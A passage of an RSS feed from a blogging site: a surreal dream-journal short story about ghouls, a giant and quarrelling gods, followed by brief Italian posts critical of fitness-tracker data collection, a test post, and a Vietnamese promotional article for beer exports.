<p>I leave Ainara and find Tom in the study behind the desk engrossed in a massive, ancient book.</p>

<p>“What’s up, Tarek?” he asks, barely looking up from the tome he’s reading.</p>

<p>“Where’s your dad?”</p>

<p>“Hmm,” he says, then motions for me to sit down across from him.</p>

<p>As I’m sitting he asks, “You remember Dr. Gallagher, right?”</p>

<p>“The one who saved your mom, of course, I remember her.”</p>

<p>“Well, she didn’t have the same luck with dad, unfortunately.”</p>

<p>My heart sinks, “Paul’s gone? I’m so sorry.”</p>

<p>Tom shifts his head left and right.</p>

<p>“He’s not quite gone.”</p>

<p>I shake my head.</p>

<p>“I’ll just show you.”</p>

<p>Tom stands up and leads me out of the study to their trophy room full of artifacts and items picked up in their adventures. It smells of dirt, tree sap, ancient smoke, and libraries full of papyrus.</p>

<p>He points to a chest on a slightly raised section of floor. It’s the size of a steamer trunk.</p>

<p>“Go ahead,” he motions. “Open it.”</p>

<p>The lid is heavier than it looks, resisting as if there is suction or magnetism holding it in place. Finally, it snaps open.</p>

<p>Inside, I see an entire world, like a doorway, hiding a jungle. Birds caw, large things stumble in the distance, but the smell is dank, cemetery, rotten.</p>

<p>“Tom,” croaks a broken voice. “Adam?”</p>

<p>Something shambles into view below the portal, brown, ragged, covered in leaves and dripping worms and worse.</p>

<p>“Tarek? Well, I’ll be,” it groans.</p>

<p>I see blue eyes buried somewhere in the hideous face and hints of a smile behind the rictus grin.</p>

<p>“Paul?”</p>

<p>It can’t be. But it is.</p>

<p>“What happened?”</p>

<p>“Thought I’d found a way to bring Ainara back,” he rasps.</p>

<p>“I was wrong.”</p>

<p>He shuffles for a moment, looking away, looking at his hands.</p>

<p>I don’t know what to say. I don’t know what to think.</p>

<p>He looks back up.</p>

<p>“If you get a chance to talk to her, Tarek. If you find a cure for her.”</p>

<p>He looks directly into my eyes.</p>

<p>“Well, you have my blessing.”</p>

<p>Then he shuffles out of view.</p>

<p>I’m still staring when Tom closes the lid.</p>

<p>He puts his arm around my shoulder.</p>

<p>“It’s an undead world down there, Tarek. I mean a world where the undead thrive and the living are endangered.”</p>

<p>He pulls me away.</p>

<p>“Dad is safe there, more than safe.”</p>

<p>At dinner, they bring out dish after dish, meat and potatoes, meat covered in cheeses, meat in exotic sauces.</p>

<p>I’m still struck by what I saw through the portal in that chest and can’t even think of food.</p>

<p>My mind wanders, distracted, distraught. I can’t focus. I can’t think.</p>

<p>What was Paul thinking to end up like that? What did Dr. Gallagher <em>do</em> to him? Why was <em>that</em> the only option?</p>

<p>Something slips and my perception fully crosses into the other, something that never happens on its own. I have to will it and I certainly did not will it.</p>

<p>I see the banquet before me as it really is. None of the meat is cooked. It is raw. It is fresh.</p>

<p>Tom, Adam, Cori, and Eri are no longer human. I see them as the ghouls they have become.</p>

<p>The girls smile at me with lipless grins. “We see you,” they say in unison.</p>

<p>I pull my sight back but still see them, still see the reality.</p>

<p>Tom’s head is grotesque, held together by wires and metal staples.</p>

<p>“Tarek! You get to join us. Mom insisted.”</p>

<p>It’s not clear how Tom manages to speak at all, but that was his voice coming from his head.</p>

<p>Adam slides in with, “She didn’t want to leave you behind after we head in after dad.”</p>

<p>Cori says, “Dr. Gallagher is already waiting for us.”</p>

<p>Eri says, “This is the way to cure mom, what dad almost got right.”</p>

<p>I swoon, my head spinning, trying to grasp what they are doing, what they are asking me to do.</p>

<p>The world closes in, becomes a pinpoint of light and everything goes dark.</p>

<p>I sit in a cavern much like the one from before, but there are no ghosts here, just cowering warriors and their shield maidens before them.</p>

<p>I sit because the caves are too narrow for me to stand. At 7 meters tall, I tower over even the tallest among them.</p>

<p>I see the arena in the distance and kneel to shuffle toward it. I will fight them there. I will fight them all.</p>

<p>I long to see if Benttite flesh is as tender and sweet as was their rivals, the Amelonians.</p>

<p>I grunt and crawl until the cavern opens up for the arena. It was filled with fighting men and women, sparring and competing.</p>

<p>“I come to fight,” I tell them, my booming voice echoing off the stone walls. “I come to fight in your legendary arena where the pinnacle of human strength, strategy, and fitness strive to best one another.”</p>

<p>Alas, when the gate swings open, the arena is empty, all warriors having fled in my wake save one who does not seem the fighting type.</p>

<p>“My Lord,” he addresses me, kneeling and breaking eye contact. “Instead of combat, perhaps you would prefer a different style of conquest.”</p>

<p>He motions toward another exit and I see healthy men and women in little clothing eyeing me with half smiles and curiosity. I scent them immediately and understand the offer.</p>

<p>Although I cannot fully honor it, I am moved by their humility.</p>

<p>I nod to the little man and move toward the harem, my mutilated manhood doing its best to prepare for the experience.</p>

<p>They appease me. They indulge me by performing with each other. I see methods of pleasure and how to both delay and prolong it that are truly inspirational.</p>

<p>All the while I am plied with exotic foods of which I have never tasted, cooked and uncooked meats of varying shapes, strange fruits and vegetables, and drink with flavours the likes of which I had never encountered.</p>

<p>Each time I am approached to join in their sexual proclivities, I redirect the man or woman back to the throng, to show me something new, some other act forbidden by all the gods of the surface world and I am never disappointed.</p>

<p>I had heard of their prowess in war and battle but not of this, not of their creative depravity in the realms of sex or of their artistic skill with meal preparation. I supposed the renowned Benttite generals, soldiers, archers, and reavers must be fighting for <em>something</em>. Why <em>not</em> this?</p>

<p>After much gentle prodding, I finally show them my sex. I lift my furs and reveal to them what curse befell me.</p>

<p>My great size was a boon granted by a god whose name I was never taught. But to keep me from bringing about a great race to challenge those gods, I was hobbled.</p>

<p>My penis is wide as an oak tree yet as short as a what remains after one is felled and what skin it does have is covered in yellow pustules filled with unsavory fluids.</p>

<p>“It has always been thus,” I assure the awestruck audience.</p>

<p>Several among them assuage me they have the finest doctor’s in the known world and that would be honoured to treat me and find a cure.</p>

<p>Again, I am touched by how they treat me, a giant who had come to find pleasure in killing and eating their best while their blood still ran hot.</p>

<p>I consider their words as I am overcome by weariness and lose consciousness. I cannot know if I will survive the night, if their hospitality is genuine or a trick of their vaunted intelligence.</p>

<p>“I’m don’t know what the problem is, Sol,” I say, standing on a pearlescent balcony overlooking the black sky. “I had a fine time down there. You think it’s done? Kaput?”</p>

<p>I walk back into Sol’s workshop. He stands or maybe sits. It’s hard to tell with him. He <em>stits</em> holding the rough-shaped platter up at arm’s length, eyeing it with a grimace, squinting.</p>

<p>“I think it’s garbage, Jove.” He shrugs. “I should just eat the whole thing and get it over with.”</p>

<p>“Wait a second, Sol.” I’m trying to save it. I’m trying to save <em>her</em>.</p>

<p>“Stick it in the void. Let them stew on it. Let them see if they can figure out that there is no other world but theirs, that everything they need just happens to be there when they need it. See if they can look <em>beyond</em> it and ascend.”</p>

<p>Sol is rolling his eyes, shrugging, throwing up his hands, but saying nothing.</p>

<p>“Talk if you want to talk,” I shout.</p>

<p>“Bah, you never listen when I do,” he yells back.</p>

<p>“Stick it in the freezer then,” I shrug. “Come back to it later.”</p>

<p>We both know “later” means “never” but I said what I said.</p>

<p>“How many freezers do you have, Sol?”</p>

<p>He waffles before muttering, “three.”</p>

<p>“Three? That’s not bad!”</p>

<p>A chorus of voices rises up from the blackness that surrounds us, “three <em>thousand</em>.”</p>

<p>“Hah,” I laugh. “That’s sounds more like you than three.”</p>

<p>“What does that mean?” he gestures while tossing the world stone to the side.</p>

<p>“You never finish anything but you can’t throw it away either.”</p>

<p>He’s still muttering, “never finish anything, you should see what I’m building, what I’ve found.”</p>

<p>He’s definitely standing up now, but still not any taller.</p>

<p>“Come with me!” he demands.</p>

<p>I follow after him, looking down at his starry crown. Was he always this short? Was he always this <em>bald</em>?</p>

<p>The golden jeweled staircase of light leads to the basement where the floor itself is torn up.</p>

<p>“You ripped up your own floor?” I ask, putting my hands on my hips.</p>

<p>“Look underneath you old fool!” he calls.</p>

<p>I see it now, a silver stream leading off into the infinite night. Big enough for a toy boat if we had a toy boat.</p>

<p>Standing next to it, I can hear a shimmering trickle, a hint at consciousness, <em>novelty</em>.</p>

<p>I see a broken up chair built into a crude boat, barely big enough to stand in.</p>

<p>Sol and Jove argue.</p>

<p>Jove asks me, by name, by my <em>real</em> name, a name I had forgotten.</p>

<p>“Jessica,” he says. “Why don’t you get us in that boat.”</p>

<p>I thought I was Jove. I look down and see Jove’s body: a tall old white man in flowing saffron robes.</p>

<p>I have our body step into the shell of the boat made from a chair.</p>

<p>I slip our feet under a little overhang to keep us from falling. It clamps down gently.</p>

<p>“Do you need to tell Sol about me or… whatever?” I ask inside Jove’s head in <em>my</em> voice, not his.</p>

<p>Jove doesn’t answer. He’s still arguing with his old friend.</p>

<p>The boat shudders and starts to move away from the shore.</p>

<p>I have our body sit down, against the back of the chair, now a small platform, so we don’t rock the boat and fall out as we see where it leads us next.</p>

<hr>

<p>#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #Fiction #Paranormal</p>
]]></content:encoded>
      <author>J. R. DePriest</author>
      <guid>https://infosec.press/read/a/zsjk2u2b36</guid>
      <pubDate>Mon, 13 Oct 2025 05:03:16 +0000</pubDate>
    </item>
    <item>
      <title>E ovviamente NO anche al Garmin</title>
      <link>https://infosec.press/critic/e-ovviamente-no-anche-al-garmin</link>
      <description>&lt;![CDATA[Trovarsi prima di correre a valutare chi ha il modello più moderno o più completo. Ma serve veramente per la prestazione in sè?]]&gt;</description>
      <content:encoded><![CDATA[<p>Trovarsi prima di correre a valutare chi ha il modello più moderno o più completo. Ma serve veramente per la prestazione in sè?</p>
]]></content:encoded>
      <author>critic</author>
      <guid>https://infosec.press/read/a/ecn5ey9dub</guid>
      <pubDate>Mon, 06 Oct 2025 07:23:47 +0000</pubDate>
    </item>
    <item>
      <title>Test post</title>
      <link>https://infosec.press/d3adc0r3/test-post</link>
      <description>&lt;![CDATA[Test post&#xA;does this work?]]&gt;</description>
      <content:encoded><![CDATA[<p>Test post
does this work?</p>
]]></content:encoded>
      <author>D3adC0r3</author>
      <guid>https://infosec.press/read/a/fa2xvn5ywm</guid>
      <pubDate>Sun, 05 Oct 2025 15:21:22 +0000</pubDate>
    </item>
    <item>
      <title>NO a Strava</title>
      <link>https://infosec.press/critic/no-a-strava</link>
      <description>&lt;![CDATA[Ormai è una moda ma personalmente non capisco il senso, soprattutto per il runner basic, di confrontarsi su una piattaforma che essenzialmente vuole i tuoi dati per profilarti.]]&gt;</description>
      <content:encoded><![CDATA[<p>Ormai è una moda ma personalmente non capisco il senso, soprattutto per il runner basic, di confrontarsi su una piattaforma che essenzialmente vuole i tuoi dati per profilarti.</p>
]]></content:encoded>
      <author>critic</author>
      <guid>https://infosec.press/read/a/jm41sm6ntt</guid>
      <pubDate>Fri, 03 Oct 2025 10:06:52 +0000</pubDate>
    </item>
    <item>
      <title>Bia xuất khẩu ngon chất lượng hàng đầu từ A&amp;B Vietnam</title>
      <link>https://infosec.press/viabvietnamvn/h1-style-text-align-justifybia-xuat-khau-ngonandnbsp-chat-luongandnbsp-hang-dau</link>
      <description>&lt;![CDATA[h1 style=&#34;text-align:justify&#34;Bia xuất khẩu ngon&amp;nbsp;chất lượng&amp;nbsp;hàng đầu từ A&amp;amp;B Vietnam/h1&#xA;&#xA;p style=&#34;text-align:justify&#34;Vị ngon bia Việt Nam ngày một ghi dấu ấn mạnh mẽ trên bản đồ đồ uống toàn cấu nhờ chất lượng vượt trội. Trong đó, A&amp;amp;B Vietnam nổi lên như một công ty tiên phong với hơn 35 năm kinh nghiệm, vận hành hệ thống cơ sở sản xuất 70.000 m&amp;sup2; và công suất hơn 1000 container/tháng. A&amp;amp;B Vietnam đã giao thương quốc tế bia tới hơn 70 quốc gia, đáp ứng trọn vẹn các điều kiện bắt buộc khắt khe như ISO, HACCP, HALAL, FDA. Hãy cùng tìm hiểu chi tiết hơn về các dòng bia mang tinh thần Việt Nam và độ hoàn hảo toàn cầu của A&amp;amp;B Vietnam./p&#xA;&#xA;p style=&#34;text-align:justify&#34;img alt=&#34;&#34; src=&#34;https://vi.abvietnam.vn/wp-content/uploads/2025/04/bia-san-xuat-va-xuat-khau-boi-ab-vietnam.jpg&#34; style=&#34;height:100%; width:100%&#34; //p&#xA;&#xA;p style=&#34;text-align:justify&#34;Chi tiết: stronga href=&#34;https://vi.abvietnam.vn/bia/&#34;Bia xuất khẩu giá tốt nhất - A&amp;amp;B Vietnam/a/strong/p&#xA;&#xA;h2 style=&#34;text-align:justify&#34;Nét chính về bia/h2&#xA;&#xA;p style=&#34;text-align:justify&#34;Bia là một thức uống có cồn quen thuộc, được điều chế từ thủ tục sản xuất lên men các vật tư sản xuất như malt đại mạch, hoa bia, men và nước. Đây là một trong những loại đồ uống có bề dày lịch sử, gắn bó mật thiết với nghệ thuật ẩm thực của nhiều dân tộc./p&#xA;&#xA;p style=&#34;text-align:justify&#34;Tại A&amp;amp;B Vietnam, bia đưa ra thị trường thế giới không chỉ là một thức uống giải khát, mà còn là một chủng loại thể hiện bản sắc văn hóa Việt với chất lượng cao quốc tế. A&amp;amp;B Vietnam luôn đề cao sự cân bằng trong mùi vị, độ tươi mát, lộ trình công nghệ tạo ra khép kín và các điều kiện bắt buộc quốc tế. Nhờ đó, từ dòng lager thanh khiết, ale đậm vị đến bia không cồn 0.0%, mỗi sản phẩm đều có nét độc đáo riêng, thỏa mãn nhu cầu đa dạng tại các nơi bán hàng khác nhau./p&#xA;&#xA;h2 style=&#34;text-align:justify&#34;Các dòng bia xuất cảng chiến lược của A&amp;amp;B Vietnam/h2&#xA;&#xA;p style=&#34;text-align:justify&#34;Với tầm nhìn trở thành nhà làm ra và tiêu thụ ở nước ngoài bia hàng đầu khu vực, A&amp;amp;B Vietnam đã xây dựng một danh mục vật phẩm hết sức phong phú, phục vụ thị hiếu khác biệt của người tiêu dùng quốc tế./p&#xA;&#xA;ul&#xA;&#x9;li style=&#34;text-align:justify&#34;strongBia Lager/strong thanh mát, dễ uống, là dòng bia có tính phổ biến toàn cầu./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongBia Ale (Stout)/strong đậm đà, giàu vị đặc trưng, rất được ưa chuộng tại nơi bán hàng châu Âu./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongBia Lager không cồn/strong là một lựa chọn lý tưởng cho các quốc gia Hồi giáo và những người tiêu dùng quan tâm đến sức khỏe./li&#xA;/ul&#xA;&#xA;p style=&#34;text-align:justify&#34;Mỗi dòng bia đều được gia công trên dây chuyền tối tân, tuân thủ nghiêm ngặt điều kiện bắt buộc quốc tế, vừa bảo toàn mùi vị Việt Nam, vừa khẳng định độ hoàn hảo phân phối quốc tế uy tín./p&#xA;&#xA;h2 style=&#34;text-align:justify&#34;Nguyên liệu và lộ trình công nghệ gia công đạt chuẩn quốc tế/h2&#xA;&#xA;p style=&#34;text-align:justify&#34;Để tạo ra những dòng hàng bia có vị đặc trưng ổn định và độ hoàn hảo, A&amp;amp;B Vietnam luôn đặc biệt chú trọng từ khâu tuyển chọn thành phần cốt lõi đến chu trình gia công. Chỉ những yếu tố đầu vào tốt nhất mới được đưa vào dây chuyền nhằm đảm bảo vị đặc trưng chuẩn mực./p&#xA;&#xA;ul&#xA;&#x9;li style=&#34;text-align:justify&#34;strongMalt đại mạch/strong cung cấp vị cân bằng và độ sánh đặc trưng cho bia./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongHoa bia/strong tạo ra mùi hương tinh tế và hậu vị đắng cân bằng hoàn hảo./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongMen bia/strong là nhân tố quyết định quá trình lên men ổn định, giữ trọn vẹn sự tinh khiết./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongNguồn nước tinh khiết/strong được xác minh tiêu chuẩn nghiêm ngặt theo các tiêu chuẩn quốc tế./li&#xA;/ul&#xA;&#xA;p style=&#34;text-align:justify&#34;thủ tục sản xuất điều chế bia bao gồm 11 bước khép kín, từ chuẩn bị thành phần cốt lõi, nấu và đường hóa, đến lên men, lọc trong và đóng gói. Toàn bộ đều được giám sát chặt chẽ theo các thông số kỹ thuật ISO 22000, HACCP, HALAL, FDA, đảm bảo mỗi lon bia khi tiêu thụ ở nước ngoài đều đạt giá trị toàn cầu./p&#xA;&#xA;h2 style=&#34;text-align:justify&#34;Bao bì sản phẩm và quy cách bia bán ra nước ngoài/h2&#xA;&#xA;p style=&#34;text-align:justify&#34;Để phục vụ nhu cầu đa dạng của các nhà nhập khẩu và hệ thống cung ứng quốc tế, A&amp;amp;B Vietnam tiêu thụ nhiều lựa chọn về vỏ đựng. Mỗi thiết kế đều được tối ưu hóa cho sự tiện lợi, khả năng bảo quản và lý tưởng với từng kênh cung ứng./p&#xA;&#xA;ul&#xA;&#x9;li style=&#34;text-align:justify&#34;strongLon 250ml, 330ml, 500ml/strong phù hợp cho kênh bán lẻ như siêu thị, cửa hàng tiện lợi, nhà hàng, khách sạn./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongThùng carton 12 hoặc 24 lon/strong được thiết kế để tối ưu hóa chi phí và không gian khi vận chuyển bằng container quốc tế./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongVỏ hộp/strong có thiết kế sang trọng, hiện đại, in đầy đủ thông tin (Nutrition Facts, ABV, hạn sử dụng) và mã QR truy xuất nguồn gốc, gia tăng sự tin cậy./li&#xA;/ul&#xA;&#xA;p style=&#34;text-align:justify&#34;Nhờ sự đa dạng này, hàng hóa bia của A&amp;amp;B Vietnam không chỉ thuận tiện trong khâu nhập khẩu và cung cấp mà còn tạo được ấn tượng chuyên nghiệp với người tiêu dùng tại nhiều nơi bán hàng toàn cầu./p&#xA;&#xA;h2 style=&#34;text-align:justify&#34;Kênh phân phối xuất khẩu của A&amp;amp;B Vietnam/h2&#xA;&#xA;p style=&#34;text-align:justify&#34;Với năng suất điều chế mạnh mẽ và mạng lưới bán hàng toàn cầu, A&amp;amp;B Vietnam đã đưa các thương hiệu bia Việt Nam như Camel, Cheetah, Abest, Saola, Steen, Two Red Tigers đến nhiều khu vực quan trọng. A&amp;amp;B Vietnam luôn nghiên cứu kỹ lưỡng đặc thù của mỗi kênh phân phối để mang đến hàng sản xuất tối ưu nhất./p&#xA;&#xA;ul&#xA;&#x9;li style=&#34;text-align:justify&#34;strongChâu Âu/strong Đức, Anh, Pháp, Hà Lan ưa chuộng bia lager và stout có hương thơm đậm đà./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongChâu Á/strong Nhật Bản, Hàn Quốc, Singapore đánh giá cao sự thanh mát, dễ uống của bia lager./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongTrung Đông/strong UAE, Ả Rập Saudi tập trung vào dòng bia không cồn đạt quy định HALAL./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongChâu Phi &amp;amp; Châu Mỹ/strong là những khu vực tiêu thụ mới nổi, đang mở rộng nhanh chóng./li&#xA;/ul&#xA;&#xA;p style=&#34;text-align:justify&#34;Với năng lực cung ứng hơn 1000 container mỗi tháng, A&amp;amp;B Vietnam không chỉ đáp ứng tốt nhu cầu ổn định mà còn sẵn sàng mở rộng thị phần. Đây chính là nền tảng để chúng tôi trở thành bên hợp tác tiêu thụ ở nước ngoài bia chiến lược cho nhiều doanh nghiệp./p&#xA;&#xA;h2 style=&#34;text-align:justify&#34;Lý do chọn A&amp;amp;B Vietnam làm bên hợp tác bán ra nước ngoài bia/h2&#xA;&#xA;p style=&#34;text-align:justify&#34;Trong tình hình cạnh tranh khốc liệt, việc lựa chọn một bên hợp tác chế tác và bán ra nước ngoài uy tín là yếu tố quyết định thành công. A&amp;amp;B Vietnam, với kinh nghiệm, nền tảng làm ra hiện đại và giá trị quốc tế, đã trở thành cái tên đáng tin cậy./p&#xA;&#xA;ul&#xA;&#x9;li style=&#34;text-align:justify&#34;strong35 năm bề dày kinh nghiệm/strong trong ngành, khẳng định sự uy tín và ổn định./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongCơ sở sản xuất hiện đại/strong tại miền Bắc và miền Trung, đảm bảo khả năng chế biến quy mô lớn./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongTiêu thụ ở nước ngoài đến hơn 70 quốc gia/strong, xây dựng mạng lưới phân phối toàn cầu./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongThông số kỹ thuật quốc tế/strong ISO, HACCP, HALAL, FDA, đáp ứng các yêu cầu nghiêm ngặt nhất./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongĐội ngũ R&amp;amp;D chuyên môn cao/strong, liên tục phát triển sản phẩm mới thích hợp thị hiếu./li&#xA;&#x9;li style=&#34;text-align:justify&#34;strongMOQ thấp, linh hoạt/strong cho cộng sự thử nghiệm vật phẩm và nhập khẩu theo giai đoạn./li&#xA;/ul&#xA;&#xA;p style=&#34;text-align:justify&#34;Với sự kết hợp giữa bề dày kinh nghiệm, công nghệ hiện đại và đảm bảo đẳng cấp, A&amp;amp;B Vietnam không chỉ cung cấp những hàng sản xuất bia đạt chuẩn mà còn đồng hành cùng người đồng hành chinh phục kênh phân phối toàn cầu. Hãy gọi ngay với A&amp;amp;B Vietnam để cùng nhau đưa vị đặc trưng bia Việt Nam vươn xa./p&#xA;&#xA;p style=&#34;text-align:right&#34;A&amp;amp;B Vietnam/p]]&gt;</description>
      <content:encoded><![CDATA[<h1 style="text-align:justify">Bia xuất khẩu ngon chất lượng hàng đầu từ A&amp;B Vietnam</h1>

<p style="text-align:justify">Vị ngon bia Việt Nam ngày một ghi dấu ấn mạnh mẽ trên bản đồ đồ uống toàn cấu nhờ chất lượng vượt trội. Trong đó, A&amp;B Vietnam nổi lên như một công ty tiên phong với hơn 35 năm kinh nghiệm, vận hành hệ thống cơ sở sản xuất 70.000 m² và công suất hơn 1000 container/tháng. A&amp;B Vietnam đã giao thương quốc tế bia tới hơn 70 quốc gia, đáp ứng trọn vẹn các điều kiện bắt buộc khắt khe như ISO, HACCP, HALAL, FDA. Hãy cùng tìm hiểu chi tiết hơn về các dòng bia mang tinh thần Việt Nam và độ hoàn hảo toàn cầu của A&amp;B Vietnam.</p>

<p style="text-align:justify"><img alt="" src="https://vi.abvietnam.vn/wp-content/uploads/2025/04/bia-san-xuat-va-xuat-khau-boi-ab-vietnam.jpg" style="height:100%; width:100%"/></p>

<p style="text-align:justify">Chi tiết: <strong><a href="https://vi.abvietnam.vn/bia/" rel="nofollow">Bia xuất khẩu giá tốt nhất - A&amp;B Vietnam</a></strong></p>

<h2 style="text-align:justify">Nét chính về bia</h2>

<p style="text-align:justify">Bia là một thức uống có cồn quen thuộc, được điều chế từ thủ tục sản xuất lên men các vật tư sản xuất như malt đại mạch, hoa bia, men và nước. Đây là một trong những loại đồ uống có bề dày lịch sử, gắn bó mật thiết với nghệ thuật ẩm thực của nhiều dân tộc.</p>

<p style="text-align:justify">Tại A&amp;B Vietnam, bia đưa ra thị trường thế giới không chỉ là một thức uống giải khát, mà còn là một chủng loại thể hiện bản sắc văn hóa Việt với chất lượng cao quốc tế. A&amp;B Vietnam luôn đề cao sự cân bằng trong mùi vị, độ tươi mát, lộ trình công nghệ tạo ra khép kín và các điều kiện bắt buộc quốc tế. Nhờ đó, từ dòng lager thanh khiết, ale đậm vị đến bia không cồn 0.0%, mỗi sản phẩm đều có nét độc đáo riêng, thỏa mãn nhu cầu đa dạng tại các nơi bán hàng khác nhau.</p>

<h2 style="text-align:justify">Các dòng bia xuất cảng chiến lược của A&amp;B Vietnam</h2>

<p style="text-align:justify">Với tầm nhìn trở thành nhà làm ra và tiêu thụ ở nước ngoài bia hàng đầu khu vực, A&amp;B Vietnam đã xây dựng một danh mục vật phẩm hết sức phong phú, phục vụ thị hiếu khác biệt của người tiêu dùng quốc tế.</p>

<ul>    <li style="text-align:justify"><strong>Bia Lager</strong> thanh mát, dễ uống, là dòng bia có tính phổ biến toàn cầu.</li>
    <li style="text-align:justify"><strong>Bia Ale (Stout)</strong> đậm đà, giàu vị đặc trưng, rất được ưa chuộng tại nơi bán hàng châu Âu.</li>
    <li style="text-align:justify"><strong>Bia Lager không cồn</strong> là một lựa chọn lý tưởng cho các quốc gia Hồi giáo và những người tiêu dùng quan tâm đến sức khỏe.</li></ul>

<p style="text-align:justify">Mỗi dòng bia đều được gia công trên dây chuyền tối tân, tuân thủ nghiêm ngặt điều kiện bắt buộc quốc tế, vừa bảo toàn mùi vị Việt Nam, vừa khẳng định độ hoàn hảo phân phối quốc tế uy tín.</p>

<h2 style="text-align:justify">Nguyên liệu và lộ trình công nghệ gia công đạt chuẩn quốc tế</h2>

<p style="text-align:justify">Để tạo ra những dòng hàng bia có vị đặc trưng ổn định và độ hoàn hảo, A&amp;B Vietnam luôn đặc biệt chú trọng từ khâu tuyển chọn thành phần cốt lõi đến chu trình gia công. Chỉ những yếu tố đầu vào tốt nhất mới được đưa vào dây chuyền nhằm đảm bảo vị đặc trưng chuẩn mực.</p>

<ul>    <li style="text-align:justify"><strong>Malt đại mạch</strong> cung cấp vị cân bằng và độ sánh đặc trưng cho bia.</li>
    <li style="text-align:justify"><strong>Hoa bia</strong> tạo ra mùi hương tinh tế và hậu vị đắng cân bằng hoàn hảo.</li>
    <li style="text-align:justify"><strong>Men bia</strong> là nhân tố quyết định quá trình lên men ổn định, giữ trọn vẹn sự tinh khiết.</li>
    <li style="text-align:justify"><strong>Nguồn nước tinh khiết</strong> được xác minh tiêu chuẩn nghiêm ngặt theo các tiêu chuẩn quốc tế.</li></ul>

<p style="text-align:justify">thủ tục sản xuất điều chế bia bao gồm 11 bước khép kín, từ chuẩn bị thành phần cốt lõi, nấu và đường hóa, đến lên men, lọc trong và đóng gói. Toàn bộ đều được giám sát chặt chẽ theo các thông số kỹ thuật ISO 22000, HACCP, HALAL, FDA, đảm bảo mỗi lon bia khi tiêu thụ ở nước ngoài đều đạt giá trị toàn cầu.</p>

<h2 style="text-align:justify">Bao bì sản phẩm và quy cách bia bán ra nước ngoài</h2>

<p style="text-align:justify">Để phục vụ nhu cầu đa dạng của các nhà nhập khẩu và hệ thống cung ứng quốc tế, A&amp;B Vietnam tiêu thụ nhiều lựa chọn về vỏ đựng. Mỗi thiết kế đều được tối ưu hóa cho sự tiện lợi, khả năng bảo quản và lý tưởng với từng kênh cung ứng.</p>

<ul>    <li style="text-align:justify"><strong>Lon 250ml, 330ml, 500ml</strong> phù hợp cho kênh bán lẻ như siêu thị, cửa hàng tiện lợi, nhà hàng, khách sạn.</li>
    <li style="text-align:justify"><strong>Thùng carton 12 hoặc 24 lon</strong> được thiết kế để tối ưu hóa chi phí và không gian khi vận chuyển bằng container quốc tế.</li>
    <li style="text-align:justify"><strong>Vỏ hộp</strong> có thiết kế sang trọng, hiện đại, in đầy đủ thông tin (Nutrition Facts, ABV, hạn sử dụng) và mã QR truy xuất nguồn gốc, gia tăng sự tin cậy.</li></ul>

<p style="text-align:justify">Nhờ sự đa dạng này, hàng hóa bia của A&amp;B Vietnam không chỉ thuận tiện trong khâu nhập khẩu và cung cấp mà còn tạo được ấn tượng chuyên nghiệp với người tiêu dùng tại nhiều nơi bán hàng toàn cầu.</p>

<h2 style="text-align:justify">Kênh phân phối xuất khẩu của A&amp;B Vietnam</h2>

<p style="text-align:justify">Với năng suất điều chế mạnh mẽ và mạng lưới bán hàng toàn cầu, A&amp;B Vietnam đã đưa các thương hiệu bia Việt Nam như Camel, Cheetah, Abest, Saola, Steen, Two Red Tigers đến nhiều khu vực quan trọng. A&amp;B Vietnam luôn nghiên cứu kỹ lưỡng đặc thù của mỗi kênh phân phối để mang đến hàng sản xuất tối ưu nhất.</p>

<ul>    <li style="text-align:justify"><strong>Châu Âu</strong> Đức, Anh, Pháp, Hà Lan ưa chuộng bia lager và stout có hương thơm đậm đà.</li>
    <li style="text-align:justify"><strong>Châu Á</strong> Nhật Bản, Hàn Quốc, Singapore đánh giá cao sự thanh mát, dễ uống của bia lager.</li>
    <li style="text-align:justify"><strong>Trung Đông</strong> UAE, Ả Rập Saudi tập trung vào dòng bia không cồn đạt quy định HALAL.</li>
    <li style="text-align:justify"><strong>Châu Phi &amp; Châu Mỹ</strong> là những khu vực tiêu thụ mới nổi, đang mở rộng nhanh chóng.</li></ul>

<p style="text-align:justify">Với năng lực cung ứng hơn 1000 container mỗi tháng, A&amp;B Vietnam không chỉ đáp ứng tốt nhu cầu ổn định mà còn sẵn sàng mở rộng thị phần. Đây chính là nền tảng để chúng tôi trở thành bên hợp tác tiêu thụ ở nước ngoài bia chiến lược cho nhiều doanh nghiệp.</p>

<h2 style="text-align:justify">Lý do chọn A&amp;B Vietnam làm bên hợp tác bán ra nước ngoài bia</h2>

<p style="text-align:justify">Trong tình hình cạnh tranh khốc liệt, việc lựa chọn một bên hợp tác chế tác và bán ra nước ngoài uy tín là yếu tố quyết định thành công. A&amp;B Vietnam, với kinh nghiệm, nền tảng làm ra hiện đại và giá trị quốc tế, đã trở thành cái tên đáng tin cậy.</p>

<ul>    <li style="text-align:justify"><strong>35 năm bề dày kinh nghiệm</strong> trong ngành, khẳng định sự uy tín và ổn định.</li>
    <li style="text-align:justify"><strong>Cơ sở sản xuất hiện đại</strong> tại miền Bắc và miền Trung, đảm bảo khả năng chế biến quy mô lớn.</li>
    <li style="text-align:justify"><strong>Tiêu thụ ở nước ngoài đến hơn 70 quốc gia</strong>, xây dựng mạng lưới phân phối toàn cầu.</li>
    <li style="text-align:justify"><strong>Thông số kỹ thuật quốc tế</strong> ISO, HACCP, HALAL, FDA, đáp ứng các yêu cầu nghiêm ngặt nhất.</li>
    <li style="text-align:justify"><strong>Đội ngũ R&amp;D chuyên môn cao</strong>, liên tục phát triển sản phẩm mới thích hợp thị hiếu.</li>
    <li style="text-align:justify"><strong>MOQ thấp, linh hoạt</strong> cho cộng sự thử nghiệm vật phẩm và nhập khẩu theo giai đoạn.</li></ul>

